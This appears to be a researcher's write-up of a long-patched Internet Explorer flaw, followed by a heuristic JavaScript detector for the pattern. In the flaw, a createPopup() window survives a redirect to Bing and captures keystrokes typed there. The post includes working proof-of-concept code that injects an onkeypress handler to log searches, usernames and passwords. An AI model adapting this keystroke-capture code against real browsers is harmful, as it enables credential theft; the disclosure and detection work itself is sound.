Building on the earlier resident-popup findings, I put together a demonstration showing that a popup created with createPopup() before a redirect can capture keystrokes typed into the redirected page. The popup stays visible, injects a document.onkeypress handler, and reports everything the user types (searches, usernames, or passwords) without any indication that anything unusual is happening.

<script language="JavaScript">
function main()
{
    var win = window.open("redir.aspx");

    var cp = win.createPopup();
    cp.document.bgColor = "blue";
    cp.document.body.innerHTML =    '<div style="font-family:Arial;font-size:12px;color:#ffffff;">&nbsp;&nbsp;Wow! We are at Bing but we are still alive and kicking!<br /><br />' +
                                    '&nbsp;&nbsp;<b>Check out how we capture every keystroke.</b>' +
                                    '&nbsp;&nbsp;Go ahead, start typing inside Bing\'s search-box and see it in action.<br /><br />' +
                                    '&nbsp;&nbsp;We can capture searches, usernames, passwords, etc, etc.<br /><br />' +
                                    '&nbsp;&nbsp;<span style="font-size:12px;color:red;font-weight: bold;" id="typedText">&nbsp;&nbsp;</span><br />' +
                                    '</div>' +
                                    '<script defer="defer">' +
                                    '   document.onkeypress = function(){' +
                                    '       document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
                                    '   }' +
                                    '<\/script>';
    cp.show(200, 0, 700, 120);
}
</script>
<input type="button" size="50" onclick="main()" value="Open new window and show createPopup()">

redir.aspx redirects to Bing. The popup is created and shown before the redirect completes, and its markup includes a defer-tagged script that sets up a keypress handler. Because the popup survives the navigation, its onkeypress handler fires on every key the user types, regardless of which input field they are focused on within the Bing page.
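A heuristic static check for the pattern described above (a popup created on a window.open() handle whose document receives a key handler), added here as an example and not part of the original demonstration. The function names and the constructed sample string are assumptions.

```javascript
// Added example: heuristic static check, not code from the original post.
// All function and field names are hypothetical.
const KEY_HANDLER = /\bon(?:keypress|keydown|keyup)\b/i;
const IDENT = "[A-Za-z_$][\\w$]*";

// True if a key handler appears between the first <popupVar>.document
// reference and the <popupVar>.show(...) call (or the end of the script).
function popupWritesKeyHandler(source, popupVar) {
  const start = source.indexOf(popupVar + ".document");
  if (start === -1) return false;
  const shown = source.indexOf(popupVar + ".show(", start);
  const region = source.slice(start, shown === -1 ? source.length : shown);
  return KEY_HANDLER.test(region);
}

function findResidentPopupKeyCapture(source) {
  // Step 1: variables that hold a handle returned by window.open(...).
  const opened = new Set();
  const openRe = new RegExp("(" + IDENT + ")\\s*=\\s*window\\.open\\s*\\(", "g");
  for (const m of source.matchAll(openRe)) opened.add(m[1]);

  // Step 2: popups created on one of those handles, e.g. cp = win.createPopup().
  const findings = [];
  const popupRe = new RegExp(
    "(" + IDENT + ")\\s*=\\s*(" + IDENT + ")\\.createPopup\\s*\\(", "g");
  for (const m of source.matchAll(popupRe)) {
    const popupVar = m[1], ownerVar = m[2];
    if (!opened.has(ownerVar)) continue; // popup on the page's own window
    // Step 3: does the popup's document receive a key handler?
    findings.push({ popupVar, ownerVar,
      installsKeyHandler: popupWritesKeyHandler(source, popupVar) });
  }
  return findings;
}

// Constructed sample, abbreviated from the demonstration above.
const SAMPLE = [
  'var win = window.open("redir.aspx");',
  'var cp = win.createPopup();',
  'cp.document.body.innerHTML = "<script defer>" +',
  '    "document.onkeypress = function(){};<\\/script>";',
  'cp.show(200, 0, 700, 120);',
].join("\n");

console.log(findResidentPopupKeyCapture(SAMPLE));
```

The check is textual, so it misses chained calls and aliased handles; treat a finding as a prompt for manual review of the script.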

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.